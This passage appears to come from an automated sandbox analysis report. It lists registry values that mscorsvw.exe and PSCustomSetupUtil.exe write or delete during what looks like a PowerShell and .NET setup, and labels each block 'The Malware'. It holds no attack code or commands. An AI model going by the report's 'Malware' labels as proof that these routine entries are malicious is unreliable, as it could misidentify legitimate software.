[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67]
"DisplayName" = "Microsoft.PowerShell.Commands.Management,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5c]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF E1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF E1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "93 EC BD 2C AA C4 D0 53 C2 CA 68 67 9F DB 13 24"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"ConfigMask" = "4361"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "92"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67]
"LastModTime" = "FA BB 8F 7B 03 86 D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3a6a696d\638045d1\2c\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

The Malware deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5a]

The process mscorsvw.exe:1112 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"DisplayName" = "Microsoft.PowerShell.Commands.Utility,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\3fcdfaca\10\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\643db07b\27\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"
"ConfigMask" = "4361"
"MVID" = "93 92 67 97 48 6D 4F 7A 9B 69 C5 87 5F F3 FC 30"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5d]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF F1"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF E1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"ConfigString" = "ZAP--0000-0000"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66]
"LastModTime" = "9A E1 B5 7B 03 86 D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\43970528\4b\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"Status" = "0"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66]
"DisplayName" = "Microsoft.PowerShell.Commands.Utility,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5d]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF E1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF F1"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9D E4 74 25 E5 4F E5 5E DE 11 0E 6D A3 D0 D8 B0"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66]
"SIG" = "EF D0 54 19 D0 F5 86 44 A9 62 4E 86 6A 5F 6C 6E"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "93"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66]
"Status" = "4098"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

The Malware deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5b]

The process mscorsvw.exe:2940 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\109ad3ab\680c6dce\64]
"DisplayName" = "Microsoft.PowerShell.Editor,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\51be0150\645507bd\5d\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d4f0e50\1a238210\5b]
"ILDependencies" = "DD EC CC 77 30 C1 FF 61 0A 00 00 00 03 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF F9"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\268e923b\24\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d4f0e50\1a238210\5b]
"ConfigString" = "ZAP--0000-0000"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\109ad3ab\680c6dce\64\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2ffb0c52\5076361\3\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\3fcdfaca\10\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6e35940e\3a9b43f3\4\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5f]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF F9"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\77ccecdd\61ffc130\a\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\109ad3ab\680c6dce\64]
"Status" = "4098"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5f]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FD"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d4f0e50\1a238210\5b]
"ConfigMask" = "4361"
"MVID" = "72 A5 E7 88 C4 07 6B 67 EC 68 97 DA DB 9C 00 B6"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\528efda8\4d0ed383\c\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FD"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d4f0e50\1a238210\5b]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BC 72 7F 69 84 68 18 0C B3 BC D8 45 2A C6 D4 D4"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d4f0e50\1a238210\5b]
"DisplayName" = "Microsoft.PowerShell.Editor,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\109ad3ab\680c6dce\64]
"LastModTime" = "40 33 78 80 03 86 D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\68fb5015\45ef206\b\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\109ad3ab\680c6dce\64]
"SIG" = "EC 74 C4 48 ED 80 64 4D BD A4 D7 78 32 8C 96 D8"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "95"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d4f0e50\1a238210\5b]
"Status" = "0"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

The Malware deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5d]

The process PSCustomSetupUtil.exe:3868 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "05 6B B4 6F E8 C0 8E 84 CF 04 7A 38 7A 02 F0 79"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Editor,1.0.0.0,,31bf3856ad364e35,MSIL" = "40 33 78 80 03 86 D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Editor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "205"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "206"
"StoreChangeIDFor64BitProcesses" = "184"
"StoreChangeIDFor32BitProcesses" = "205"

The process PSCustomSetupUtil.exe:2844 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AD E6 3C 61 55 F2 83 35 66 F4 49 E0 D6 4A 7D E9"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "188"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.ConsoleHost,1.0.0.0,,31bf3856ad364e35,MSIL" = "00 34 67 7B 03 86 D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "189"
"StoreChangeIDFor64BitProcesses" = "167"
"StoreChangeIDFor32BitProcesses" = "188"

The process PSCustomSetupUtil.exe:2924 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "39 18 2F 5E 1B 33 55 F4 59 9A 3D A2 C1 E3 53 CC"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Security,1.0.0.0,,31bf3856ad364e35,MSIL" = "94 69 DE 7B 03 86 D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "191"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "192"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Security, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "170"
"StoreChangeIDFor32BitProcesses" = "191"

The process PSCustomSetupUtil.exe:3140 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CA 5A C9 EE 94 85 6A 21 2E A3 1F 04 2E BB 49 50"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.ConsoleHost.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.ConsoleHost.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "08 10 C8 7C 03 86 D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "197"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "198"
"StoreChangeIDFor64BitProcesses" = "176"
"StoreChangeIDFor32BitProcesses" = "197"

The process PSCustomSetupUtil.exe:3004 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "50 CD 6D EB CE AE 9A 36 18 C9 D7 C5 62 49 17 E7"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.WSMan.Runtime, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "193"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.WSMan.Runtime,1.0.0.0,,31bf3856ad364e35,MSIL" = "2E 17 2D 7C 03 86 D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "194"
"StoreChangeIDFor64BitProcesses" = "172"
"StoreChangeIDFor32BitProcesses" = "193"

The process PSCustomSetupUtil.exe:3060 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "55 8D 51 07 D9 B3 F9 9E 3C 55 A1 42 19 96 1C CF"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.BackgroundIntelligentTransfer.Management,1.0.0.0,,31bf3856ad364e35,MSIL" = "6E 62 79 7C 03 86 D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.BackgroundIntelligentTransfer.Management, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "195"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "196"
"StoreChangeIDFor64BitProcesses" = "174"
"StoreChangeIDFor32BitProcesses" = "195"

The process PSCustomSetupUtil.exe:3308 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "94 00 C5 13 FF 57 75 B9 D5 56 1B 99 B2 ED E5 B0"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.BackgroundIntelligentTransfer.Management.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.BackgroundIntelligentTransfer.Management.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "0C 7E 78 7D 03 86 D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "203"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "204"
"StoreChangeIDFor64BitProcesses" = "182"
"StoreChangeIDFor32BitProcesses" = "203"

The process PSCustomSetupUtil.exe:3736 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4C 26 7E BD 4E EF 33 92 46 73 1D CD A1 02 A1 EA"

[HKLM\System\CurrentControlSet\Control\Session Manager\Environment]
"Path" = "C:\Perl\site\bin;C:\Perl\bin;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;c:\Program Files\Wireshark;%System%\WindowsPowerShell\v1.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The process PSCustomSetupUtil.exe:3164 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "84 86 2A 7F 93 12 02 56 6E 10 EC 0E 5F 6F B0 AB"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Management.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "F4 70 E9 7C 03 86 D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "198"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "199"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Management.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "177"
"StoreChangeIDFor32BitProcesses" = "198"

The process PSCustomSetupUtil.exe:3232 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "03 16 5B 2D A4 65 01 3B 09 87 44 52 17 85 53 61"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Security.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "64 A9 22 7D 03 86 D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Security.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "200"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "201"
"StoreChangeIDFor64BitProcesses" = "179"
"StoreChangeIDFor32BitProcesses" = "200"

The process PSCustomSetupUtil.exe:3028 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7A 58 E4 2A 0C 1B 46 92 3C 0E 06 CF 3E 9B D4 6F"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.WSMan.Management, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.WSMan.Management,1.0.0.0,,31bf3856ad364e35,MSIL" = "CE 3C 53 7C 03 86 D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "194"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "195"
"StoreChangeIDFor64BitProcesses" = "173"
"StoreChangeIDFor32BitProcesses" = "194"

The process PSCustomSetupUtil.exe:3104 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8F 23 37 1F DC F6 AB 0A E8 7B 2C D3 7C 61 AC 1D"

